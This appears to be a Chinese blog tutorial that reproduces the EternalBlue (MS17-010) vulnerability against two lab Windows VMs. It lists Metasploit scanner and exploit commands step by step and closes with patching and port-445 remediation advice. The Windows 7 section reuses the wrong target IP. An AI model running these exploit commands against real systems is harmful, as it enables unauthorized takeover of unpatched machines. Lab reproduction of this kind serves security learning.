admin 管理员组文章数量: 887007
🍬 博主介绍
👨🎓 博主介绍:大家好,我是 _PowerShell ,很高兴认识大家~
✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】
🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋
🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
🙏作者水平有限,欢迎各位大佬指点,相互学习进步!
文章目录
- 🍬 博主介绍
- 一、永恒之蓝简介
- 二、影响范围
- 三、环境搭建
- 四、漏洞复现
- 1、Windows Server 2008 R2 Datacenter 7601 Service Pack 1
- 1.搜索ms17-010相关模块
- 2.使用检测模块
- 3.获取权限
- 2、Windows 7 Home Basic 7600 x64 (64-bit)
- 1.搜索ms17-010相关模块
- 2.使用检测模块
- 3.获取权限
- 五、漏洞修复
这里简单演示一下,下一篇文章详细写利用该漏洞留存后门相关知识
一、永恒之蓝简介
永恒之蓝(MS17-010)了,他的爆发源于WannaCry勒索病毒的诞生。
该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的危险漏洞“EternalBlue”(永恒之蓝)进行传播 。勒索病毒肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。最新统计数据显示,100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。 勒索病毒是自熊猫烧香以来影响力最大的病毒之一。
永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。
二、影响范围
Windows XP
Windows Server 2003
Windows Vista
Windows Server 2008
Windows 7
Windows Server2008 R2
Windows 8.1
Windows Server 2012
Windows10
Windows Server 2012 R2
Windows Server 2016
三、环境搭建
上面版本中随便找一个搭建就行
然后关闭防火墙,开启3389端口
我这里搭建了两个版本
Windows Server 2008 R2 Datacenter 7601 Service Pack 1
Windows 7 Home Basic 7600 x64 (64-bit)
四、漏洞复现
进入msf控制台
msfconsole
1、Windows Server 2008 R2 Datacenter 7601 Service Pack 1
1.搜索ms17-010相关模块
search ms17-010
2.使用检测模块
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.13.182
run
3.获取权限
use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.13.182
Run
2、Windows 7 Home Basic 7600 x64 (64-bit)
1.搜索ms17-010相关模块
search ms17-010
2.使用检测模块
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.13.183
run
3.获取权限
use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.13.182
run
五、漏洞修复
受影响的系统版本可以参照:
https://docs.microsoft/zh-cn/security-updates/securitybulletins/2017/ms17-010
关闭445端口。
打开防火墙,安装安全软件。
安装对应补丁。
版权声明:本文标题:[ MSF使用实例 ] 利用永恒之蓝(MS17-010)漏洞导致windows靶机蓝屏并获取靶机权限 内容由网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.freenas.com.cn/jishu/1732776040h1554507.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论